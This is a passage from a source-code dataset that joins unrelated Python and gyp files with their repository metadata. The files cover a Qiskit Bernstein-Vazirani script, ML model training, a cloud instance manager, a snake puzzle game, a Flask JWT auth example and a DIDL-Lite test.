for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.rx(-0.09738937226128368,input_qubit[2]) # number=2
prog.h(input_qubit[1]) # number=33
prog.y(input_qubit[2]) # number=56
prog.cz(input_qubit[2],input_qubit[1]) # number=34
prog.h(input_qubit[1]) # number=35
prog.h(input_qubit[1]) # number=3
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
sample_shot =4000
writefile = open("../data/startQiskit_QC402.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_belem")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 29.090426
| 140
| 0.629366
|
0494ef7d345738254004903ce4758167057e8ba9
| 7,432
|
py
|
Python
|
src/models/train_model.py
|
carolmoraescruz/case_seazone
|
76b44a64272685681442929c04ea9e4fd21a147e
|
[
"MIT"
] | null | null | null |
src/models/train_model.py
|
carolmoraescruz/case_seazone
|
76b44a64272685681442929c04ea9e4fd21a147e
|
[
"MIT"
] | null | null | null |
src/models/train_model.py
|
carolmoraescruz/case_seazone
|
76b44a64272685681442929c04ea9e4fd21a147e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pandas as pd
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPRegressor
from xgboost import XGBRegressor
from sklearn.metrics import mean_absolute_error as mae
from src import (
PATH_PREPROCESSOR_COVID_IMPACT,
PATH_PREPROCESSOR_PRICE_MODEL_Q1,
PATH_PREPROCESSOR_RESERVATIONS_MODEL_Q3,
PATH_PREPROCESSOR_REVENUE_MODEL_Q1,
PATH_PREPROCESSOR_REVENUE_MODEL_Q2,
PATH_REGRESSOR_COVID_IMPACT,
PATH_REGRESSOR_PRICE_MODEL_Q1,
PATH_REGRESSOR_RESERVATIONS_MODEL_Q3,
PATH_REGRESSOR_REVENUE_MODEL_Q1,
PATH_REGRESSOR_REVENUE_MODEL_Q2,
)
from src.features.build_features import (
build_features_covid_impact_model,
build_features_reservations_model_q3,
build_features_revenue_model_q1,
build_features_revenue_model_q2,
build_features_price_model_q1,
)
from src.models.preprocessing import (
fit_preprocess_covid_impact_model,
fit_preprocess_price_model_q1,
fit_preprocess_reservations_model_q3,
fit_preprocess_revenue_model_q2,
preprocess_transform,
)
from src.commons import dump_pickle
def train_price_model_q1(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the price estimator to be used on question 1.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
pd.DataFrame
Returns a sklearn-like regressor instance.
"""
print("Training price model - Q1")
X, y = build_features_price_model_q1(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_price_model_q1(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = XGBRegressor(max_depth=6, n_estimators=300).fit(X_train, y_train)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_PRICE_MODEL_Q1)
dump_pickle(model, PATH_REGRESSOR_PRICE_MODEL_Q1)
print("MAE(teste) = {:.2f}".format(score))
def train_revenue_model_q1(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used on question 1.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
pd.DataFrame
Returns a sklearn-like regressor instance.
"""
print("Training revenue model - Q1")
X, y = build_features_revenue_model_q1(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_revenue_model_q2(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = XGBRegressor(max_depth=6, n_estimators=300).fit(X_train, y_train)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_REVENUE_MODEL_Q1)
dump_pickle(model, PATH_REGRESSOR_REVENUE_MODEL_Q1)
print("MAE(teste) = {:.2f}".format(score))
def train_revenue_model_q2(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used on question 2.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
pd.DataFrame
Returns a sklearn-like regressor instance.
"""
print("Training revenue model - Q2")
X, y = build_features_revenue_model_q2(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_revenue_model_q2(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = MLPRegressor(
hidden_layer_sizes=(5, 10, 10, 5, 5),
solver="lbfgs",
learning_rate="adaptive",
learning_rate_init=0.03,
max_iter=10000,
random_state=42,
).fit(X_train, y_train)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_REVENUE_MODEL_Q2)
dump_pickle(model, PATH_REGRESSOR_REVENUE_MODEL_Q2)
print("MAE(teste) = {:.2f}".format(score))
def train_reservations_model_q3(df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used on question 3.
Parameters
----------
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
pd.DataFrame
Returns a sklearn-like regressor instance.
"""
print("Training reservations model - Q3")
X, y = build_features_reservations_model_q3(df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_reservations_model_q3(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = XGBRegressor(max_depth=6, n_estimators=100, reg_alpha=0.5).fit(
X_train, y_train
)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_RESERVATIONS_MODEL_Q3)
dump_pickle(model, PATH_REGRESSOR_RESERVATIONS_MODEL_Q3)
print("MAE(teste) = {:.2f}".format(score))
def train_covid_impact_model(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used to estimate covid-19 impact.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
pd.DataFrame
Returns a sklearn-like regressor instance.
"""
print("Training model for covid-19 impact on revenue")
X, y = build_features_covid_impact_model(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_covid_impact_model(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = RandomForestRegressor(n_estimators=100, random_state=42).fit(
X_train, y_train
)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_COVID_IMPACT)
dump_pickle(model, PATH_REGRESSOR_COVID_IMPACT)
print("MAE(teste) = {:.2f}".format(score))
| 29.728
| 89
| 0.702503
|
dd98c24bfe5f6a450bf4dcecf83039b06d464fbe
| 3,346
|
py
|
Python
|
spotty/providers/abstract_instance_manager.py
|
vexcel-data/spotty
|
f6d56129a088908a5b8dcf303867af85e3bdf325
|
[
"MIT"
] | null | null | null |
spotty/providers/abstract_instance_manager.py
|
vexcel-data/spotty
|
f6d56129a088908a5b8dcf303867af85e3bdf325
|
[
"MIT"
] | null | null | null |
spotty/providers/abstract_instance_manager.py
|
vexcel-data/spotty
|
f6d56129a088908a5b8dcf303867af85e3bdf325
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import Optional
from spotty.commands.writers.abstract_output_writrer import AbstractOutputWriter
from spotty.config.abstract_instance_config import AbstractInstanceConfig
from spotty.config.project_config import ProjectConfig
class AbstractInstanceManager(ABC):
def __init__(self, project_config: ProjectConfig, instance_config: dict, fork_id: Optional[str] = None):
self._project_config = project_config
self._instance_config = self._get_instance_config(instance_config)
self._fork_id = fork_id
@abstractmethod
def _get_instance_config(self, config: dict) -> AbstractInstanceConfig:
"""A factory method to create a provider's instance config."""
raise NotImplementedError
@abstractmethod
def is_running(self):
"""Checks if the instance is running."""
raise NotImplementedError
@abstractmethod
def start(self, output: AbstractOutputWriter, dry_run=False):
"""Creates a stack with the instance."""
raise NotImplementedError
@abstractmethod
def stop(self, output: AbstractOutputWriter):
"""Deletes the stack."""
raise NotImplementedError
@abstractmethod
def clean(self, output: AbstractOutputWriter):
"""Deletes the stack."""
raise NotImplementedError
@abstractmethod
def sync(self, output: AbstractOutputWriter, dry_run=False):
"""Synchronizes the project code with the instance."""
raise NotImplementedError
@abstractmethod
def download(self, download_filters: list, output: AbstractOutputWriter, dry_run=False):
"""Downloads files from the instance."""
raise NotImplementedError
@abstractmethod
def get_status_text(self) -> str:
"""Returns information about the started instance.
It will be shown to the user once the instance is started and by using the "status" command.
"""
raise NotImplementedError
@abstractmethod
def get_public_ip_address(self) -> str:
"""Returns a public IP address of the running instance."""
raise NotImplementedError
def get_ip_address(self):
"""Returns an IP address that will be used for SSH connections."""
if self._instance_config.local_ssh_port:
return '127.0.0.1'
public_ip_address = self.get_public_ip_address()
if not public_ip_address:
raise ValueError('The running instance doesn\'t have a public IP address.\n'
'Use the "localSshPort" parameter if you want to create a tunnel to the instance.')
return public_ip_address
@property
def ssh_port(self) -> int:
if self._instance_config.local_ssh_port:
return self._instance_config.local_ssh_port
return 22
@property
@abstractmethod
def ssh_user(self) -> str:
raise NotImplementedError
@property
@abstractmethod
def ssh_key_path(self) -> str:
raise NotImplementedError
@property
def project_config(self) -> ProjectConfig:
return self._project_config
@property
def instance_config(self) -> AbstractInstanceConfig:
return self._instance_config
@property
def fork_id(self) -> Optional[str]:
return self._fork_id
| 32.173077
| 112
| 0.69217
|
9142980c2ecb3dd382e797858495d2f7ace30de5
| 414
|
py
|
Python
|
recursion/harmonic_sum.py
|
JunzhongLin/leetcode_practice
|
47b2f5cc3c87de004ae21a94024e751b40b8f559
|
[
"MIT"
] | null | null | null |
recursion/harmonic_sum.py
|
JunzhongLin/leetcode_practice
|
47b2f5cc3c87de004ae21a94024e751b40b8f559
|
[
"MIT"
] | null | null | null |
recursion/harmonic_sum.py
|
JunzhongLin/leetcode_practice
|
47b2f5cc3c87de004ae21a94024e751b40b8f559
|
[
"MIT"
] | null | null | null |
'''
Write a Python program to calculate the harmonic sum of n-1. Go to the editor
Note: The harmonic sum is the sum of reciprocals of the positive integers.
Example : 1+ 1/2 +1/3 .....
'''
class Solution:
def harmonic_sum(self, num):
if num == 1:
return 1
else:
return 1/num + self.harmonic_sum(num-1)
if __name__ == '__main__':
res = Solution().harmonic_sum(4)
| 23
| 77
| 0.620773
|
9f0811a052b044c5c97a37913b78c7dbaf3505ad
| 492
|
gyp
|
Python
|
library/boost-typeof/1.62.0.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-06T15:22:16.000Z
|
2015-11-27T18:13:04.000Z
|
library/boost-typeof/1.62.0.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 7
|
2015-02-10T15:13:38.000Z
|
2021-05-30T07:51:13.000Z
|
library/boost-typeof/1.62.0.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-29T17:19:53.000Z
|
2016-01-06T12:50:06.000Z
|
{
"targets": [
{
"target_name": "boost-typeof",
"type": "none",
"dependencies": [
"../boost-mpl-type_traits-typeof-utility/boost-mpl-type_traits-typeof-utility.gyp:boost-mpl-type_traits-typeof-utility"
],
"export_dependent_settings": [
"../boost-mpl-type_traits-typeof-utility/boost-mpl-type_traits-typeof-utility.gyp:boost-mpl-type_traits-typeof-utility"
]
}
]
}
| 32.8
| 135
| 0.552846
|
5d1941a2e3500908ca7577304511fb8b684716ec
| 171
|
py
|
Python
|
pythonteste/Aula17.3.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
pythonteste/Aula17.3.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
pythonteste/Aula17.3.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
valores=list()
for c in range(0,5):
valores.append(int(input("Digite um valor: ")))
for c, v in enumerate(valores):
print(f"N posição {c} encontrei o valor {v}.")
| 28.5
| 51
| 0.654971
|
690d0d2dd9565ed78d3b94a90c188fc110d0314c
| 4,430
|
py
|
Python
|
backend/app/extensions/auth_praeto.py
|
breachr/breachr_homepage
|
a781da4056ca5527069ca2b7069aeaddb2196ca0
|
[
"MIT"
] | null | null | null |
backend/app/extensions/auth_praeto.py
|
breachr/breachr_homepage
|
a781da4056ca5527069ca2b7069aeaddb2196ca0
|
[
"MIT"
] | null | null | null |
backend/app/extensions/auth_praeto.py
|
breachr/breachr_homepage
|
a781da4056ca5527069ca2b7069aeaddb2196ca0
|
[
"MIT"
] | null | null | null |
import flask
import flask_praetorian
import flask_cors
from app import db
from app import app
guard = flask_praetorian.Praetorian()
cors = flask_cors.CORS()
# A generic ProtectedUser model that might be used by an app powered by flask-praetorian
class ProtectedUser(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.Text, unique=True)
password = db.Column(db.Text)
roles = db.Column(db.Text)
is_active = db.Column(db.Boolean, default=True, server_default='true')
@property
def rolenames(self):
try:
return self.roles.split(',')
except Exception:
return []
@classmethod
def lookup(cls, username):
return cls.query.filter_by(username=username).one_or_none()
@classmethod
def identify(cls, id):
return cls.query.get(id)
@property
def identity(self):
return self.id
def is_valid(self):
return self.is_active
app.config['SECRET_KEY'] = 'top secret'
app.config['JWT_ACCESS_LIFESPAN'] = {'hours': 24}
app.config['JWT_REFRESH_LIFESPAN'] = {'days': 30}
# Initialize the flask-praetorian instance for the app
guard.init_app(app, ProtectedUser)
# Initializes CORS so that the api_tool can talk to the example app
cors.init_app(app)
# Add users for the example
# with app.app_context():
# # db.create_all()
# db.session.add(ProtectedUser(
# username='TheDude',
# password=guard.hash_password('abides'),
# ))
# db.session.add(ProtectedUser(
# username='Walter',
# password=guard.hash_password('calmerthanyouare'),
# roles='admin'
# ))
# db.session.add(ProtectedUser(
# username='Donnie',
# password=guard.hash_password('iamthewalrus'),
# roles='operator'
# ))
# db.session.add(ProtectedUser(
# username='Maude',
# password=guard.hash_password('andthorough'),
# roles='operator,admin'
# ))
# db.session.commit()
# Set up some routes for the example
@app.route('/login', methods=['POST'])
def login():
"""
Logs a user in by parsing a POST request containing user credentials and
issuing a JWT token.
.. example::
$ curl http://localhost:5000/login -X POST \
-d '{"username":"Walter","password":"calmerthanyouare"}'
"""
req = flask.request.get_json(force=True)
username = req.get('username', None)
password = req.get('password', None)
user = guard.authenticate(username, password)
ret = {'access_token': guard.encode_jwt_token(user)}
return (flask.jsonify(ret), 200)
@app.route('/protected')
@flask_praetorian.auth_required
def protected():
"""
A protected endpoint. The auth_required decorator will require a header
containing a valid JWT
.. example::
$ curl http://localhost:5000/protected -X GET \
-H "Authorization: Bearer <your_token>"
"""
return flask.jsonify(message='protected endpoint (allowed user {})'.format(
flask_praetorian.current_user().username,
))
@app.route('/protected_admin_required')
@flask_praetorian.roles_required('admin')
def protected_admin_required():
"""
A protected endpoint that requires a role. The roles_required decorator
will require that the supplied JWT includes the required roles
.. example::
$ curl http://localhost:5000/protected_admin_required -X GET \
-H "Authorization: Bearer <your_token>"
"""
return flask.jsonify(
message='protected_admin_required endpoint (allowed user {})'.format(
flask_praetorian.current_user().username,
)
)
@app.route('/protected_operator_accepted')
@flask_praetorian.roles_accepted('operator', 'admin')
def protected_operator_accepted():
"""
A protected endpoint that accepts any of the listed roles. The
roles_accepted decorator will require that the supplied JWT includes at
least one of the accepted roles
.. example::
$ curl http://localhost/protected_operator_accepted -X GET \
-H "Authorization: Bearer <your_token>"
"""
return flask.jsonify(
message='protected_operator_accepted endpoint (allowed usr {})'.format(
flask_praetorian.current_user().username,
)
)
| 31.197183
| 89
| 0.64447
|
c53c8f75539389ef4a672703f585e08d52c98a18
| 9,794
|
py
|
Python
|
snake_and_priest.py
|
emadflash/snake_and_priest
|
97eac807dde2b260e5785877bfaf4d9d70a070fc
|
[
"Unlicense"
] | null | null | null |
snake_and_priest.py
|
emadflash/snake_and_priest
|
97eac807dde2b260e5785877bfaf4d9d70a070fc
|
[
"Unlicense"
] | null | null | null |
snake_and_priest.py
|
emadflash/snake_and_priest
|
97eac807dde2b260e5785877bfaf4d9d70a070fc
|
[
"Unlicense"
] | null | null | null |
import enum
from dataclasses import dataclass
import time
import pygame
class Direction(enum.Enum):
Right = 1
Left = 2
Up = 3
Down = 4
@dataclass
class Position:
x: int
y: int
def MoveUp(self, limit):
self.x -= 1
if self.x < 0:
self.x = limit - 1
def MoveDown(self, limit):
self.x += 1
if self.x >= limit:
self.x = 0
def MoveLeft(self, limit):
self.y -= 1
if self.y < 0:
self.y = limit - 1
def MoveRight(self, limit):
self.y += 1
if self.y > limit:
self.y = 0
def __gt__(self, other):
if self.x == other.x:
return self.y > other.y
else:
return self.x > other.x
def __eq__(self, other):
if self.x == other.x and self.y == other.y:
return True
else:
return False
class Snake:
def __init__(self, name, start, end):
self.name: str = name
self.start: Position = start
self.end: Position = end
self.cells = []
self.direction: Direction
if self.start.x == self.end.x:
if self.start.y > self.end.y:
self.direction = Direction.Right
else:
self.direction = Direction.Left
else:
if self.start.x > self.end.x:
self.direction = Direction.Down
else:
self.direction = Direction.Up
self.init_cells()
def init_cells(self) -> None:
if self.direction == Direction.Up:
if self.start.x > self.end.x:
count = abs((self.start.x - self.end.x) - board_size)
for i in range(1, count):
new_x = (self.start.x + i) % board_size
self.cells.append(Position(new_x, self.start.y))
else:
count = self.end.x - self.start.x
for i in range(1, count):
new_x = (self.start.x + i)
self.cells.append(Position(new_x, self.start.y))
elif self.direction == Direction.Down:
if self.start.x < self.end.x:
count = abs((self.end.x - self.start.x) - board_size)
for i in range(1, count):
new_x = (self.end.x + i) % board_size
self.cells.append(Position(new_x, self.start.x))
else:
count = self.start.x - self.end.x
for i in range(1, count):
new_x = (self.end.x + i)
self.cells.append(Position(new_x, self.start.y))
elif self.direction == Direction.Right:
if self.start.y < self.end.y:
count = abs((self.start.y - self.end.y) - board_size)
for i in range(1, count):
new_y = (self.start.y + i) % board_size
self.cells.append(Position(self.start.x, new_y))
else:
count = self.start.y - self.end.y
for i in range(1, count):
new_y = (self.start.y + i)
self.cells.append(Position(self.start.x, new_y))
elif self.direction == Direction.Left:
if self.start.y > self.end.y:
count = abs((self.start.y - self.end.y) - board_size)
for i in range(1, count):
new_y = (self.start.y + i) % board_size
self.cells.append(Position(self.start.x, new_y))
else:
count = self.end.y - self.start.y
for i in range(1, count):
new_y = (self.start.y + i)
self.cells.append(Position(self.start.x, new_y))
def check_collision(self, pos: Position) -> bool:
return bool(self.start == pos or self.end == pos or pos in self.cells)
def __str__(self):
return f"""
{self.name}
start: ({self.start.x} {self.start.y})
end: ({self.end.x}, {self.end.y})
Direction: {self.direction}
Cells: {self.cells}
"""
class Priest:
def __init__(self, pos, direction):
self.pos: Position = pos
self.direction: Direction = direction
def init_board():
size = int(input())
return size * [size * [0]]
def init_snakes():
snakes = []
snakes_count = int(input())
def getPos(lst):
return list(map(lambda x: x - 1, map(int, lst)))
for _ in range(snakes_count):
s = input().split(' ')
start_pos = getPos(s[1].split(','))
end_pos = getPos(s[2].split(','))
snakes.append(Snake(s[0],
Position(start_pos[0], start_pos[1]),
Position(end_pos[0], end_pos[1]),
))
return snakes
def print_snakes(snakes) -> None:
for i in snakes:
print(i)
def init_priest(board_size) -> (Priest, Position):
pos: Position
respective_end: Position
direction: Position
data = input()
d = data[0]
start = int(data[1])
if d == 'W':
pos = Position(start - 1, 0)
direction = Direction.Right
respective_end = Position(start - 1, board_size - 1)
elif d == 'E':
pos = Position(start - 1, 0)
direction = Direction.Left
respective_end = Position(start - 1, 0)
elif d == 'N':
pos = Position(0, start - 1)
direction = Direction.Down
respective_end = Position(board_size - 1, start - 1)
elif d == 'S':
pos = Position(board_size - 1, start - 1)
direction = Direction.Up
respective_end = Position(0, start - 1)
return (Priest(pos, direction), respective_end)
def update_snakes(snakes, board_size):
for i in snakes:
if i.direction == Direction.Up:
i.start.MoveUp(board_size)
i.end.MoveUp(board_size)
for i in i.cells:
i.MoveUp(board_size);
elif i.direction == Direction.Down:
i.start.MoveDown(board_size)
i.end.MoveDown(board_size)
for i in i.cells:
i.MoveDown(board_size);
elif i.direction == Direction.Left:
i.start.MoveLeft(board_size)
i.end.MoveLeft(board_size)
for i in i.cells:
i.MoveLeft(board_size);
elif i.direction == Direction.Right:
i.start.MoveRight(board_size)
i.end.MoveRight(board_size)
for i in i.cells:
i.MoveRight(board_size);
return snakes
def update_priest(priest):
if priest.direction == Direction.Up:
priest.pos.x -= 1
elif priest.direction == Direction.Down:
priest.pos.x += 1
elif priest.direction == Direction.Right:
priest.pos.y += 1
elif priest.direction == Direction.Left:
priest.pos.y -= 1
return priest
class Game:
def __init__(self, rows, cols, snakes, priest, win_pos):
self.snakes = snakes
self.priest = priest
self.win_pos = win_pos
self.rows = rows
self.cols = cols
self.__fps = 60
self.height = 600
self.width = 600
pygame.init()
self.WIN = pygame.display.set_mode((self.height, self.width))
pygame.display.set_caption('snake and a priest')
self.blockSize = self.get_blk_size()
def get_blk_size(self):
return int(self.height / self.rows)
def render_snakes(self):
for snake in self.snakes:
r = pygame.Rect(snake.start.y* self.blockSize, snake.start.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (3, 123, 123), r, 0)
r = pygame.Rect(snake.end.y* self.blockSize, snake.end.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (3, 123, 123), r, 0)
for i in snake.cells:
r = pygame.Rect(i.y* self.blockSize, i.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (3, 123, 123), r, 0)
update_snakes(self.snakes, 10)
pygame.display.flip()
def render_priest(self):
r = pygame.Rect(self.priest.pos.y* self.blockSize, self.priest.pos.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (0, 0, 255), r, 0)
update_priest(self.priest)
pygame.display.flip()
def run(self):
run = True
clock = pygame.time.Clock()
tick = 0
self.WIN.fill((0, 255, 0))
self.render_snakes()
self.render_priest()
bittenBy = None
while run:
clock.tick(self.__fps)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
continue
if tick == self.__fps:
if self.priest.pos == self.win_pos:
run = False
for snake in self.snakes:
if snake.check_collision(self.priest.pos):
bittenBy = snake
run = False
continue
self.render_snakes()
self.render_priest()
tick = 0
else:
tick += 1
self.WIN.fill((0, 255, 0))
pygame.quit()
if bittenBy is None:
print("NIRVANAN")
else:
print(bittenBy.name, self.priest.pos)
def main():
board = init_board()
board_size = len(board)
snakes = init_snakes()
priest, respective_end = init_priest(len(board))
game = Game(10, 10, snakes, priest, respective_end)
game.run()
if __name__ == '__main__':
main()
| 29.411411
| 125
| 0.52573
|
92e90b500501014a2b7171f4e2e5a037812447a1
| 910
|
py
|
Python
|
AIonAWS/aws_image_recognition.py
|
ankit98040/AWS
|
8f3459592193c3daa5310a91b3462a74ed968835
|
[
"Apache-2.0"
] | 1
|
2021-03-17T07:28:50.000Z
|
2021-03-17T07:28:50.000Z
|
AIonAWS/aws_image_recognition.py
|
ankit98040/AWS
|
8f3459592193c3daa5310a91b3462a74ed968835
|
[
"Apache-2.0"
] | null | null | null |
AIonAWS/aws_image_recognition.py
|
ankit98040/AWS
|
8f3459592193c3daa5310a91b3462a74ed968835
|
[
"Apache-2.0"
] | null | null | null |
#webcam photo click
import cv2
import boto3
cap = cv2.VideoCapture(0)
#activates the camera
#0 for internal webcam, 1 for any external web cam
myphoto = "ankit.jpg"
ret , photo = cap.read()
#clicks the photo
#print(ret)
cv2.imwrite(myphoto, photo)
cap.release()
#releases the camera
#uploading image to s3
region = "ap-southeast-1"
bucket = "aiawsankit"
s3 = boto3.resource('s3')
s3.Bucket(bucket).upload_file(myphoto, "file.jpg")
#connect rek: ask for method
rek = boto3.client('rekognition', region)
#client => resource
#but resource only has a few service so for other services, we use client
upimage = "file.jpg"
response = rek.detect_labels(
Image={
'S3Object': {
'Bucket': bucket,
'Name': upimage
}
},
MaxLabels=10,
MinConfidence=50
)
#response
for i in range(5):
print( response['Labels'][i]['Name'])
| 25.277778
| 73
| 0.648352
|
2595ea9d34fc54285d10ab72ffea0a94b745970e
| 21,784
|
py
|
Python
|
tests/test_didl_lite.py
|
chishm/python-didl-lite
|
ace0e134f7759c766d455f33c3cef552067fa799
|
[
"Apache-2.0"
] | null | null | null |
tests/test_didl_lite.py
|
chishm/python-didl-lite
|
ace0e134f7759c766d455f33c3cef552067fa799
|
[
"Apache-2.0"
] | null | null | null |
tests/test_didl_lite.py
|
chishm/python-didl-lite
|
ace0e134f7759c766d455f33c3cef552067fa799
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Unit tests for didl_lite."""
from defusedxml import ElementTree as ET # type: ignore
from didl_lite import didl_lite
NAMESPACES = {
"didl_lite": "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/",
"dc": "http://purl.org/dc/elements/1.1/",
"upnp": "urn:schemas-upnp-org:metadata-1-0/upnp/",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
class TestDidlLite:
"""Tests for didl_lite."""
def test_item_from_xml(self) -> None:
"""Test item from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert item.xml_el is not None
assert getattr(item, "title") == "Audio Item Title"
assert getattr(item, "upnp_class") == "object.item.audioItem"
assert getattr(item, "language") == "English"
assert isinstance(item, didl_lite.AudioItem)
assert not hasattr(item, "non_existing")
resources = item.res
